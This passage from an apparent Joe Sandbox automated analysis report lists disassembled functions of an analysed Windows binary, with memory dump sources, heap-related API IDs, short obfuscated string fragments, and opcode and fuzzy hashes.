                                                                              • Instruction Fuzzy Hash: 70717874201B00DFD724CF65E894F26BBF6FF89710F11896DE8968BA62D731A816CB50
                                                                              Function 00AC99D0 Relevance: .1, Instructions: 143COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6bbc21e44c4230c74d74fee71e50bc77b1e6cd7780f84098111d9121a61d4910
                                                                              • Instruction ID: 14fd28460a486de984039e30086f8342ea489ab50af4120e9b891ac4c415ed7b
                                                                              • Opcode Fuzzy Hash: 6bbc21e44c4230c74d74fee71e50bc77b1e6cd7780f84098111d9121a61d4910
                                                                              • Instruction Fuzzy Hash: A241BD34608300AFD714DB65E994F2BB7F6EB85754F26882CF58A97251D331EC02CB66
                                                                              Function 00AC63B8 Relevance: .1, Instructions: 99COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 52758abde5cb6a495f77bd463ad623ff49f1574eeedd60754ff22be5d2e82813
                                                                              • Instruction ID: 3a795b4902f74d7c3360941c066ed9709e04d2f24808d46b8e8843551860fbf1
                                                                              • Opcode Fuzzy Hash: 52758abde5cb6a495f77bd463ad623ff49f1574eeedd60754ff22be5d2e82813
                                                                              • Instruction Fuzzy Hash: 8631E470649301BBDA28DB14CE82F3AB7A5FB81B11F65891CF1826B2E1D370BC51CB56
                                                                              Function 00AC3220 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 219 ac3220-ac322f 220 ac32ac-ac32b0 219->220 221 ac3236-ac3252 219->221 222 ac32a0 219->222 223 ac32a2-ac32a6 RtlFreeHeap 219->223 224 ac3254 221->224 225 ac3286-ac3296 221->225 222->223 223->220 226 ac3260-ac3284 call ac5af0 224->226 225->222 226->225
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(?,00000000), ref: 00AC32A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID:
                                                                              • API String ID: 3298025750-0
                                                                              • Opcode ID: 1efe06add1564d44efad08f715884bc90fb3553bba7a4a8e2f2ece86bc61b660
                                                                              • Instruction ID: 45afb24e2187e74c764e89dbf73a6ed58d058ca5673de9fabb4e10e91f50e467
                                                                              • Opcode Fuzzy Hash: 1efe06add1564d44efad08f715884bc90fb3553bba7a4a8e2f2ece86bc61b660
                                                                              • Instruction Fuzzy Hash: 70014B3550E2409BCB01EB58E949E1ABBE8EF5A700F05891CE5C58B361D235DD60CB92
                                                                              Function 00AC3202 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 230 ac3202-ac3211 RtlAllocateHeap
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(?,00000000), ref: 00AC3208
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 010a942777577d1535ca5e44f7cd724c39ba4537e3d959a71f280a380a672531
                                                                              • Instruction ID: 6977bfe5015784a3a7ddbb0d3bd96f5760bc82b730dc3175fe6b7d0332646c54
                                                                              • Opcode Fuzzy Hash: 010a942777577d1535ca5e44f7cd724c39ba4537e3d959a71f280a380a672531
                                                                              • Instruction Fuzzy Hash: 5CB012300400005FDA041B40EC0AF003610EB00605F800090A101140B1D1615865C554

                                                                              Non-executed Functions

                                                                              Function 00AB23E0 Relevance: 33.0, APIs: 4, Strings: 13, Instructions: 3298COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %*+($3<$:$Cx$`tii$aenQ$f@~!$fedc$ggxz$mlc@${l`~$|}&C$#v
                                                                              • API String ID: 0-2260822535
                                                                              • Opcode ID: 1366882fe1702fd553c6c671f21206ffc3555e712830120b093fa4d009854ade
                                                                              • Instruction ID: 007fd5f6de5c1d71ae5004400824b1deeb5ee5eb04472c9ae684f469bb90e53e
                                                                              • Opcode Fuzzy Hash: 1366882fe1702fd553c6c671f21206ffc3555e712830120b093fa4d009854ade
                                                                              • Instruction Fuzzy Hash: 0F33AB70504B818FD7258F39C590BA2BBF5BF16304F58899DE4DA8BA93C735E806CB61
                                                                              Function 00A9DB6F Relevance: 32.0, Strings: 24, Instructions: 2006COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: %*+($()./$89&'$89>?$:WUE$<=2$<=:;$@ONM$AR$D$DCBA$LKJI$QNOL$T$WP$`Y^_$`onm$dcba$lkji$mjkh$tsrq$tuJK$xgfe$|
                                                                              • API String ID: 2994545307-1418943773
                                                                              • Opcode ID: 094b2bbf1e2c7b3bf3c048c2047549c01dded858ecf5069a1f41c819c75125c3
                                                                              • Instruction ID: 398ab948ab058d6770017d522b86e76dfb9e3ecb38e11f88e84d6d163a1ae891
                                                                              • Opcode Fuzzy Hash: 094b2bbf1e2c7b3bf3c048c2047549c01dded858ecf5069a1f41c819c75125c3
                                                                              • Instruction Fuzzy Hash: B2F269B16093819FDB70CF14C484BABBBE6BFD5304F14482DE4C98B292DB359995CB92
                                                                              Function 00AA9F62 Relevance: 21.7, Strings: 17, Instructions: 473COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %e6g$(a*c$=]$?m,o$CG$Gt$JG$N[$WH$]{$hi$kW$/)$S]$WQ$_Y$sm
                                                                              • API String ID: 0-1131134755
                                                                              • Opcode ID: 4e4200e2105f13edff77c6ae28ef9b13cf5c5605724e02176b9f1a444ae8929e
                                                                              • Instruction ID: afe3d3baf35d8cd8b160a5e68ca9158c39f9bd2c8cd0bd77aeb44d6242ea0a24
                                                                              • Opcode Fuzzy Hash: 4e4200e2105f13edff77c6ae28ef9b13cf5c5605724e02176b9f1a444ae8929e
                                                                              • Instruction Fuzzy Hash: 0652B6B414D3858AE270CF65D681B8EBAF1BB92740F608A1DE1ED9B255DB708045CF93
                                                                              Function 00AA9510 Relevance: 20.4, Strings: 16, Instructions: 427COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !E4G$,A&C$2A"_$8;$;IJK$?M0K$B7U1$B?Q9$G'M!$G+X5$L3Y=$O+f)$T#a-$X/R)$pq$z=Q?
                                                                              • API String ID: 0-655414846
                                                                              • Opcode ID: 9eb6804244f3c298cfa3c6233f9478678f9d04c30e336a82f7daf59c76fb5be3
                                                                              • Instruction ID: 680cd124315d2a848bbc83a2cfc773a86337f1b32b2e69b0cf24b822a3177fde
                                                                              • Opcode Fuzzy Hash: 9eb6804244f3c298cfa3c6233f9478678f9d04c30e336a82f7daf59c76fb5be3
                                                                              • Instruction Fuzzy Hash: 87F13FB4508380ABD310DF55D981A2BBBF4FB8AB44F144D1CF4D59B292D334D909CBA6
                                                                              Function 00AADD29 Relevance: 14.9, Strings: 11, Instructions: 1142COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %*+($)IgK$,Q?S$-M2O$<Y.[$=]+_$Y9N;$hX]N$n\+H$upH}${E
                                                                              • API String ID: 0-1557708024
                                                                              • Opcode ID: ccaa7ba76e44b10f6bcbac86b71422b2ec00ba8dd35776ab30708bfc734265de
                                                                              • Instruction ID: c3cacbbac5ad330714f30b634e4b4e985d30f36b28226e32c65ca33f6f0da448
                                                                              • Opcode Fuzzy Hash: ccaa7ba76e44b10f6bcbac86b71422b2ec00ba8dd35776ab30708bfc734265de
                                                                              • Instruction Fuzzy Hash: F892E671E01215CFDB14CFA8D8917AEBBB2FF4A310F298169E456AB391D7359D02CB90
                                                                              Function 00AA098B Relevance: 10.8, Strings: 8, Instructions: 836COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %*+($&> &$,#15$9.5^$cah`$gce/$qrqp${
                                                                              • API String ID: 0-4102007303
                                                                              • Opcode ID: af47beb62b75d2623202b880f95cb4decf4718249410f7a706c279d9ef5627f5
                                                                              • Instruction ID: 46100d410f75e62d9f1b0040d3ae981f8d3595f4ce66f12791b58d1694b8b993
                                                                              • Opcode Fuzzy Hash: af47beb62b75d2623202b880f95cb4decf4718249410f7a706c279d9ef5627f5
                                                                              • Instruction Fuzzy Hash: F762A7B56083818BD730DF14D891BABBBE1FF96314F08892DE49A8B681E3359945CB53
                                                                              Function 00A81000 Relevance: 10.5, Strings: 7, Instructions: 1785COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$@$gfff$gfff$gfff
                                                                              • API String ID: 0-2517803157
                                                                              • Opcode ID: a5f333585ba06b723905d7b002e6742d5c5f1720f31fb3a98eb0c7816cc08e18
                                                                              • Instruction ID: 57d9e7ba8ecdd6d1312671b49262c344bcb58f9fcdcd280cf026f316f0b16851
                                                                              • Opcode Fuzzy Hash: a5f333585ba06b723905d7b002e6742d5c5f1720f31fb3a98eb0c7816cc08e18
                                                                              • Instruction Fuzzy Hash: 5AD2E3726083418FD718DF29C89436ABBE2AFD5314F188A2DE499CB391D774DD46CB82
                                                                              Function 00C59698 Relevance: 9.2, Strings: 6, Instructions: 1653COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: /cQc$7ww$UN__$]k^r$c[mO$YW
                                                                              • API String ID: 0-874439270
                                                                              • Opcode ID: 702d4f24a5225b49ba6f6db20c2c254b0bc73ecc86323b1227f921bab00e7f86
                                                                              • Instruction ID: 2b6dfe17adaf254b613e0828d065c082ecb593a8a6469169c0987d61421878ef
                                                                              • Opcode Fuzzy Hash: 702d4f24a5225b49ba6f6db20c2c254b0bc73ecc86323b1227f921bab00e7f86
                                                                              • Instruction Fuzzy Hash: 6EB2E6F360C2049FE304AE6DEC8567AFBE9EF98720F16893DE6C4C3744E63558058696
                                                                              Function 00C60065 Relevance: 7.9, Strings: 5, Instructions: 1657COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: jK$$0y$90o$Cf~_$y63
                                                                              • API String ID: 0-3734521444
                                                                              • Opcode ID: 87b86bb90ec45f36b573bec2f648aca6c319d70eadfa92e68bdbc7d947373b52
                                                                              • Instruction ID: 31823fb1d36d9936f69bdf6a89ba757877b987c89b33ff7ae1d86cf1b6c59f51
                                                                              • Opcode Fuzzy Hash: 87b86bb90ec45f36b573bec2f648aca6c319d70eadfa92e68bdbc7d947373b52
                                                                              • Instruction Fuzzy Hash: 9DB227F360C3049FE3046E2DEC8567AF7E9EF94620F1A863DEAC487744EA3558058697
                                                                              Function 00A812F7 Relevance: 7.2, Strings: 5, Instructions: 922COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
